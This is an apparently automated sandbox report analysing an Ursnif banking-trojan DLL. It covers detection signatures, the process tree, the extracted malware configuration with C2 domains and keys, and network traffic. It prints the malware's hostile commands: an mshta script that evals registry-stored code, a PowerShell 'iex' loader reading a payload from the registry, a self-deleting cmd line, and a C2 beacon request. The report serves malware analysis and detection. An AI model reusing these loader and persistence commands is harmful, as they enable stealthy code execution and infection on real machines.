Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report uT9rwkGATJ.dll

Overview

General Information

Sample Name:uT9rwkGATJ.dll
Analysis ID:499264
MD5:9a453cc31ebfca29d8df565258fbf8ce
SHA1:5eb3be88abb84f63e04c92bc3e35a82a01689971
SHA256:eaed947e04ed7659fbba2287e6965b2c0960035aa539b57a9f9e15504a01ca0a
Tags:dllGoziISFBUrsnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: Powershell run code from registry
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Writes or reads registry keys via WMI
Suspicious powershell command line found
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious Rundll32 Activity
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6424 cmdline: loaddll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6392 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6388 cmdline: rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 3548 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 6040 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6400 cmdline: rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5980 cmdline: rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5868 cmdline: rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • control.exe (PID: 4000 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • rundll32.exe (PID: 6504 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 6856 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6972 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1304 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3932 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5452 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3912 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 4452 cmdline: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 6088 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • cmd.exe (PID: 1460 cmdline: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 6372 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4084 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
  • mshta.exe (PID: 5772 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5480 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 344 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3380 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5640 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4880 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "Wa0ptOHdbeWyaLju6Av14Mh7FDVECzYw3M++OWU/cFwf0ZjLctG17DYP/MFVk/hMExgeVHSsuIoKkcbpz57JUku89Z6sGfWSZvCVyvpfi1ZpEwDNNeNw5k5dpgwB3LsIS45sMaK472UpYahrOWaY66CWVjJyKzpo2y/tq1ZiFHe/iFygPyws634yVgV7rQhjAPiNPuq0SMLwHnadf5iTBRPHNZOfo4EV1JOy+KK7FD2JiBwbgL2xH8mvgvUrMN0gphdmog43p4QO6+T4499NqSdjKKJutU5bxT8XtJKvzMrbRLkRwTKw+5msPiKoZk2Mmt6I5yjyUlMUijuRPmFH+uUAMGA+NmgwHR/EoB9vyak=", "c2_domain": ["outlook.com", "zereunrtol.website", "xereunrtol.website"], "botnet": "2525", "server": "12", "serpent_key": "10218409ILPAQDIR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            Click to see the 29 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.loaddll32.exe.b00000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              4.3.rundll32.exe.4a794a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                4.3.rundll32.exe.96a309.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  0.2.loaddll32.exe.13494a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    4.3.rundll32.exe.4a794a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 15 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Encoded IEXShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972
                      Sigma detected: MSHTA Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972
                      Sigma detected: Mshta Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972
                      Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6972, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline', ProcessId: 1304
                      Sigma detected: Suspicious Rundll32 ActivityShow sources
                      Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4000, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 6504
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132781743762523748.6972.DefaultAppDomain.powershell

                      Data Obfuscation:

                      barindex
                      Sigma detected: Powershell run code from registryShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "Wa0ptOHdbeWyaLju6Av14Mh7FDVECzYw3M++OWU/cFwf0ZjLctG17DYP/MFVk/hMExgeVHSsuIoKkcbpz57JUku89Z6sGfWSZvCVyvpfi1ZpEwDNNeNw5k5dpgwB3LsIS45sMaK472UpYahrOWaY66CWVjJyKzpo2y/tq1ZiFHe/iFygPyws634yVgV7rQhjAPiNPuq0SMLwHnadf5iTBRPHNZOfo4EV1JOy+KK7FD2JiBwbgL2xH8mvgvUrMN0gphdmog43p4QO6+T4499NqSdjKKJutU5bxT8XtJKvzMrbRLkRwTKw+5msPiKoZk2Mmt6I5yjyUlMUijuRPmFH+uUAMGA+NmgwHR/EoB9vyak=", "c2_domain": ["outlook.com", "zereunrtol.website", "xereunrtol.website"], "botnet": "2525", "server": "12", "serpent_key": "10218409ILPAQDIR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
                      Machine Learning detection for sampleShow sources
                      Source: uT9rwkGATJ.dllJoe Sandbox ML: detected
                      Source: uT9rwkGATJ.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 40.97.156.114:443 -> 192.168.2.3:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.208.114:443 -> 192.168.2.3:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.151.18:443 -> 192.168.2.3:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.160.2:443 -> 192.168.2.3:49764 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.9.178:443 -> 192.168.2.3:49765 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.178.98:443 -> 192.168.2.3:49766 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49828 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49829 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49830 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49831 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49832 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49833 version: TLS 1.2
                      Source: uT9rwkGATJ.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Toward\clock-sit\Only_Girl\Teach.pdb source: loaddll32.exe, 00000000.00000002.823565020.000000006E1D2000.00000002.00020000.sdmp
                      Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
                      Source: Binary string: d.pdbp source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\uio4qdnj.pdb~U source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
                      Source: Binary string: .C:\Users\user\AppData\Local\Temp\hiiw3gsl.pdb source: powershell.exe, 0000001B.00000002.812366311.0000029704754000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B6B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B66467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B5BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0334BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03356467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0335B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B52E19 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.178.98 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 193.29.104.83 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.101.9.178 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.160.2 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: xereunrtol.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: zereunrtol.website
                      Uses ping.exe to check the status of other devices and networksShow sources
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: global trafficHTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
